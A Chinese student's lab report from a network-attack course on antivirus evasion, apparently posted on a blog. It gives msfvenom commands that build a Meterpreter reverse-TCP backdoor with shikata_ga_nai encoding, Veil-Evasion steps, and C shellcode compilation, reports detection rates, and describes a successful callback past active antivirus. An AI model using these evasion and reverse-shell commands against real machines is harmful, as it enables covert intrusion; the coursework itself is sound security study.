20155338《网络对抗》Exp3 免杀原理与实践

20155338《网络对抗》Exp3 免杀原理与实践

实验过程

一、免杀效果参考基准

Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒。

二、使用msf编码器

  • 编码一次,在Kali输入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5338端口号 -f exe >后门名字.exe

结果被查出率降低了,可能是因为进行了编码的缘故,所以网站监测结果降低了 5个百分点。

  • 多次编码,在Kali中输入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5338端口号 -f exe > 后门名字.exe

多次编码好像和第一次的结果差不多,恢复后依然放入网站检查。

三、使用Veil-Evasion重新编写源代码

  • 这里直接使用的是老师的Kali,veil已经安装好。

  • 在Kali的终端中启动Veil-Evasion

  • 命令行中输入veil,后在veil中输入命令use evasion

  • 依次输入如下命令生成你的可执行文件:
    use c/meterpreter/rev_tcp.py

  • set LHOST Kali的IP

  • set LPORT 端口号

  • generate

  • 可执行文件的文件名

扫描结果

四、C语言调用Shellcode

  • 首先,在Kali上使用命令生成一个c语言格式的Shellcode数组。

  • 由VS编译运行生成一个.exe文件

  • 之后放入网站进行检测,效果还比较客观,只有百分之20的被查出率

五、实测进行回连

  • 按照上次实验用过的msf监听方法在Kali上打开监听,在Win主机开启杀软的情况下,运行最后生成的优化版exe文件,Kali成功获取了Win主机的权限
posted @ 2018-04-10 20:26  Csj-rup  阅读(170)  评论(0编辑  收藏  举报